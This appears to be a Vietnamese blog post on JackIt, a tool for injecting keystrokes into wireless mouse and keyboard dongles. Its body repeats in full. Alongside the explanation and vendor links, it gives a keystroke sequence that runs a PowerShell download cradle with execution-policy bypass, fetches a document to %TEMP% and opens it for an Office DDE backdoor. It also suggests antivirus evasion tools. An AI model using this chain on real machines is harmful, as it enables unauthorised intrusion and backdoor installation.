JackIt - Attacking Wireless Mouse and Keyboard Using Keystroke Injection
Hôm nay mình sẽ giới thiệu cho các bạn một tool nữa mình học được từ Black Hat là JackIt. Mục tiêu của tool này là tấn công vào radio channel giữa USB mouse/keyboard và dongle cắm vào máy. Nguyên lý hoạt động như sau:
1. Man-in-the-middle attack vào radio channel để thu thập các thông tin cần thiết như frequency, device address (dạng hex), channel power.
2. Giả tín hiệu mouse/keyboard và gửi keystroke cho dongle. Vì dongle đã được cài driver lúc victim install wireless mouse/keyboard nên sẽ tự động nhận các tín hiệu keystroke và gửi theo đường IO đến kernel.
3. Kernel sẽ nhận và thực thi keystroke.
Trong phương thức này, các bạn cần biết một ít về Ducky Script. Nếu ai tìm hiểu về hardware pen test sẽ biết USB Ducky Rubber và Ducky Script. Nếu không các bạn có thể search online và tìm hiểu thêm.
Trong demo, mình thực hiện một cuộc tấn công vô hại là mở Notepad và viết vài thứ linh tinh trên đó. Tuy nhiên, nó có thể trở nên rất nguy hiểm trong thực tế. Ví dụ như để tấn công Microsoft Office DDE bạn phải gửi file đến người nhận và chờ họ mở. Với JackIt, bạn có thể inject keystroke để tự down load file doc:
Windows+R -> powershell -NoP -Exec Bypass IEX (New-Object Net.WebClient).DownloadFile('Link to file') %TEMP%\test.doc -> ENTER
Sau đó lại tiếp tục inject key stroke để mở file
Windows+M (minimize all windows) -> Windows+R -> %TEMP%\test.doc -> ENTER -> ENTER (thay cho click ok ở pop-up 1) -> ENTER (thay cho click ok ở pop-up 2) -> ALT+X (đóng file sau khi đã có stable shell hoặc backdoor, nên migrate qua 1 process khác trước)
Trên đây là 1 ví dụ mà mình đưa ra để sử dụng kỹ thuật này vào thực tế. Ngoài ra các bạn còn có thể kết hợp với các anti-virus evasion như Veil, AVET (khi nào rảnh mình sẽ làm tut về AVET) để deliver backdoor.
Hiện tại có một số vendor đã đưa ra patch cho sản phẩm của họ. Danh sách các sản phẩm bị ảnh hưởng có ở đây:
https://www.bastille.net/research/vulnerabilities/mousejack/affected-devices/
GitHub link for JackIt: https://github.com/insecurityofthings/jackit
All credits go to the creator. I'm so glad I had a chance to talk to them at Black Hat USA 2017.
Demo
1. Man-in-the-middle attack vào radio channel để thu thập các thông tin cần thiết như frequency, device address (dạng hex), channel power.
2. Giả tín hiệu mouse/keyboard và gửi keystroke cho dongle. Vì dongle đã được cài driver lúc victim install wireless mouse/keyboard nên sẽ tự động nhận các tín hiệu keystroke và gửi theo đường IO đến kernel.
3. Kernel sẽ nhận và thực thi keystroke.
Trong phương thức này, các bạn cần biết một ít về Ducky Script. Nếu ai tìm hiểu về hardware pen test sẽ biết USB Ducky Rubber và Ducky Script. Nếu không các bạn có thể search online và tìm hiểu thêm.
Trong demo, mình thực hiện một cuộc tấn công vô hại là mở Notepad và viết vài thứ linh tinh trên đó. Tuy nhiên, nó có thể trở nên rất nguy hiểm trong thực tế. Ví dụ như để tấn công Microsoft Office DDE bạn phải gửi file đến người nhận và chờ họ mở. Với JackIt, bạn có thể inject keystroke để tự down load file doc:
Windows+R -> powershell -NoP -Exec Bypass IEX (New-Object Net.WebClient).DownloadFile('Link to file') %TEMP%\test.doc -> ENTER
Sau đó lại tiếp tục inject key stroke để mở file
Windows+M (minimize all windows) -> Windows+R -> %TEMP%\test.doc -> ENTER -> ENTER (thay cho click ok ở pop-up 1) -> ENTER (thay cho click ok ở pop-up 2) -> ALT+X (đóng file sau khi đã có stable shell hoặc backdoor, nên migrate qua 1 process khác trước)
Trên đây là 1 ví dụ mà mình đưa ra để sử dụng kỹ thuật này vào thực tế. Ngoài ra các bạn còn có thể kết hợp với các anti-virus evasion như Veil, AVET (khi nào rảnh mình sẽ làm tut về AVET) để deliver backdoor.
Hiện tại có một số vendor đã đưa ra patch cho sản phẩm của họ. Danh sách các sản phẩm bị ảnh hưởng có ở đây:
https://www.bastille.net/research/vulnerabilities/mousejack/affected-devices/
GitHub link for JackIt: https://github.com/insecurityofthings/jackit
All credits go to the creator. I'm so glad I had a chance to talk to them at Black Hat USA 2017.
Demo
Chỉnh sửa lần cuối: